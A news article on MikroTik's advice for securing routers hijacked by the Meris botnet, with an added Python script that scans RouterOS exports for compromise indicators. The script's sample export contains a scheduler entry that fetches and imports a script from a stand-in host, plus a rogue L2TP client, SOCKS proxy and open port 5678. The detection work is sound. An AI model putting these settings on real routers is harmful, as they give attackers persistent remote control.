MikroTik Shares Information on Protecting Routers Hit by Massive Meris Botnet

The Latvian network equipment manufacturer MikroTik has published guidance on how customers can protect and clean routers compromised by the massive Meris DDoS botnet over the summer. “As far as we have seen, these threat actors use the same routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability that was quickly patched,” a MikroTik spokesperson told our experts.

“Unfortunately, closing the vulnerability does not immediately secure these routers. If somebody got your credentials in 2018, just an upgrade will not help. You must also change the credentials, re-check your firewall to make sure it does not allow remote access to unknown parties, and look for scripts that you did not create.”

IoT Botnet on Steroids

The Meris botnet has been behind two record-breaking application-layer (HTTP request flood) DDoS attacks this year. The first, mitigated by Cloudflare in August, peaked at 17.2 million requests per second (RPS). The second peaked at an unprecedented 21.8 million RPS while hammering the servers of Russian internet giant Yandex earlier this month.


According to the researchers who provided details on the Yandex attack, Meris, a botnet derived from the Mirai malware code, currently controls roughly 250,000 Internet-connected devices.

Meris’s attacks on Yandex’s network started in early August with a 5.2 million RPS DDoS attack and kept growing in size:

  • 2021-08-07 – 5.2 million RPS
  • 2021-08-09 – 6.5 million RPS
  • 2021-08-29 – 9.6 million RPS
  • 2021-08-31 – 10.9 million RPS
  • 2021-09-05 – 21.8 million RPS

How to Protect and Clean your MikroTik Router?

MikroTik also shared details on how to clean and secure routers compromised by this botnet in a blog post published in recent days.

The network equipment vendor urges customers to choose strong passwords to defend their devices against brute-force attacks, and to keep RouterOS up to date to block exploitation of CVE-2018-14847, the Winbox vulnerability that MikroTik believes the Meris botnet is likely using to compromise devices.

The company outlined the best course of action, which includes the following steps:

  • Keep your MikroTik device up to date with regular upgrades.
  • Do not open access to your device from the internet to everyone; if you need remote access, only open a secure VPN service, such as IPsec.
  • Use a strong password, and even if you do, change it now!
  • Don’t assume your local network can be trusted. Malware can attempt to connect to your router if you have a weak password or no password.
  • Inspect your RouterOS configuration for unknown settings. Settings the Meris malware can set when reconfiguring compromised MikroTik routers include:
      • System -> Scheduler rules that execute a Fetch script. Remove these.
      • IP -> Socks proxy. If you don’t use this feature or don’t know what it does, disable it.
      • An L2TP client named “lvpn”, or any L2TP client that you don’t recognize.
      • An input firewall rule that allows access to port 5678.
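As an added example (not MikroTik’s own tooling), the script below checks a RouterOS `/export` dump for the four configuration indicators listed above: scheduler entries that run `/tool fetch`, an enabled SOCKS proxy, L2TP clients, and input firewall rules that accept traffic to port 5678. The sample export is constructed for this example; the RouterOS commands it proposes as fixes are standard CLI syntax but should be reviewed before they are run on a real router.

```python
"""Scan a RouterOS ``/export`` dump for the configuration indicators
MikroTik lists for Meris-compromised routers (added example, not
MikroTik's code).  Feed it the text of ``/export`` copied off a router."""
import shlex
from collections import namedtuple

Finding = namedtuple("Finding", "kind detail fix")

# Constructed sample: a hypothetical export showing all four indicators.
SAMPLE_EXPORT = """\
# sep/10/2021 09:12:01 by RouterOS 6.45.9
/interface l2tp-client
add connect-to=192.0.2.10 disabled=no name=lvpn user=vpn
/ip socks
set enabled=yes port=5678
/ip firewall filter
add action=accept chain=input comment="keep sessions" connection-state=established,related
add action=accept chain=input dst-port=5678 protocol=tcp
add action=drop chain=input in-interface=ether1
/system scheduler
add interval=10m name=U6 on-event="/tool fetch url=http://203.0.113.5/poll mode=http dst-path=poll.rsc; \\
    /import poll.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon
"""


def parse_export(text):
    """Return (section, verb, attrs) records from a RouterOS export.
    RouterOS wraps long commands with a trailing backslash, so physical
    lines are re-joined first; comment lines are dropped."""
    logical, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        logical.append(buf + line)
        buf = ""

    records, section = [], None
    for line in logical:
        if line.startswith("/"):          # section header, e.g. "/ip firewall filter"
            section = line
            continue
        tokens = shlex.split(line)        # keeps double-quoted values intact
        attrs = {}
        for tok in tokens[1:]:
            key, _, value = tok.partition("=")
            attrs[key] = value
        records.append((section, tokens[0], attrs))
    return records


def port_matches(spec, port):
    """True if *port* is covered by a RouterOS port spec such as
    "5678", "5670-5680" or "22,5678,8291"."""
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        if not lo.isdigit():
            continue
        if hi == "" and int(lo) == port:
            return True
        if hi.isdigit() and int(lo) <= port <= int(hi):
            return True
    return False


def find_meris_indicators(export_text, port=5678):
    """Return one Finding per suspicious item, each with the RouterOS
    command that removes or disables it.  Review each fix before use."""
    findings = []
    for section, _verb, a in parse_export(export_text):
        if section == "/system scheduler" and "fetch" in a.get("on-event", "").lower():
            name = a.get("name", "")
            findings.append(Finding("scheduler-fetch", name,
                                    f'/system scheduler remove [find name="{name}"]'))
        elif section == "/ip socks" and a.get("enabled") == "yes":
            findings.append(Finding("socks-enabled", "port " + a.get("port", "1080"),
                                    "/ip socks set enabled=no"))
        elif section == "/interface l2tp-client":
            name = a.get("name", "")
            findings.append(Finding("l2tp-client", name,
                                    f'/interface l2tp-client remove [find name="{name}"]'))
        elif (section == "/ip firewall filter" and a.get("chain") == "input"
              and a.get("action", "accept") == "accept"      # filter rules accept by default
              and port_matches(a.get("dst-port", ""), port)):
            dst = a.get("dst-port")
            findings.append(Finding("input-accept-port", a.get("protocol", "any") + "/" + dst,
                                    f"/ip firewall filter remove [find chain=input dst-port={dst}]"))
    return findings


if __name__ == "__main__":
    for f in find_meris_indicators(SAMPLE_EXPORT):
        print(f"{f.kind:18} {f.detail:12} fix: {f.fix}")
```

Run it against a real export and treat each hit as a lead, not a verdict: a scheduler entry that fetches a script you wrote yourself is legitimate, and UDP 5678 is also used by MikroTik Neighbor Discovery (MNDP), so check which protocol a port-5678 rule matches before removing it. The detail column carries the protocol for exactly that reason.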

“We have tried to connect with all users of RouterOS about this, but most of them have never been in contact with MikroTik and are not actively monitoring their devices. We are working on other solutions too,” MikroTik added.

“As far as we know right now, there are no new vulnerabilities in these devices. RouterOS has been recently independently audited by several contractors.”
